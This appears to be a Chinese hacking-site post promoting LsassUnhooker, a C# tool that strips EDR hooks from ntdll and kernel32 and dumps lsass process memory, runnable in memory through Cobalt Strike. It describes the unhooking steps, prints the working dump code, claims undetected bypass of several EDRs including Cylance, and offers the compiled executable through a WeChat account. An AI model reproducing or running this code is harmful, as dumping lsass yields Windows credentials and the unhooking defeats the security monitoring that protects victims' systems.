LsassUnhooker
用C#编写的小程序可以绕过EDR钩子并转储lsass进程的内容,框架:.NET Framework 4,可以用CobaltStrike execute-assembly加载内存执行,集成至CS插件。
LsassUnhooker项目地址:
https://github.com/roberreigada/LsassUnhooker
SharpUnhooker项目地址:
https://github.com/GetRektBoy724/SharpUnhooker
该代码使用SharpUnhooker项目,由@GetRektBoy724创建,工作方式如下:
它使用“PE parser stuff”读取并复制.text section原始(磁盘中)DLL
它使用和从D/Invoke修补.text section加载的DLL(以更改内存的权限)Marshal.Copy、NtProtectVirtualMemory
它通过再次读取来检查修补的内存中 DLL,并将其与原始 DLL 进行比较,以查看其是否正确修补。
通过使用SharpUnhooker和MiniDumpWriteDump函数,我能够绕过多个EDR并设法在不被发现的情况下转储lsass的内容,这是解决问题的代码:
SilentUnhooker("ntdll.dll");SilentUnhooker("kernel32.dll");String dumpFileName = Directory.GetCurrentDirectory() + "\" + "lsass.dmp";if (System.IO.File.Exists(dumpFileName)){System.IO.File.Delete(dumpFileName);}IntPtr hFile = NativeMethods.CreateFile(dumpFileName, NativeMethods.EFileAccess.GenericWrite, NativeMethods.EFileShare.None, lpSecurityAttributes: IntPtr.Zero, dwCreationDisposition: NativeMethods.ECreationDisposition.CreateAlways, dwFlagsAndAttributes: NativeMethods.EFileAttributes.Normal, hTemplateFile: IntPtr.Zero);NativeMethods._MINIDUMP_TYPE dumpType = NativeMethods._MINIDUMP_TYPE.MiniDumpWithFullMemory;var proc = Process.GetProcessesByName("lsass").FirstOrDefault();var exceptInfo = new NativeMethods.MINIDUMP_EXCEPTION_INFORMATION();var result = NativeMethods.MiniDumpWriteDump(proc.Handle, proc.Id, hFile, dumpType, ref exceptInfo, UserStreamParam: IntPtr.Zero, CallbackParam: IntPtr.Zero);if (result == true) {Console.WriteLine("lsass process was successfully dumped in " + Directory.GetCurrentDirectory() + "\" + "lsass.dmp");}else {Console.WriteLine("Error dumping lsass process");}
绕过Cylance的示例
已经编译好的LsassUnhooker.exe文件可以通过以下名片关注“Hack分享吧”回复“0413”获取!
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...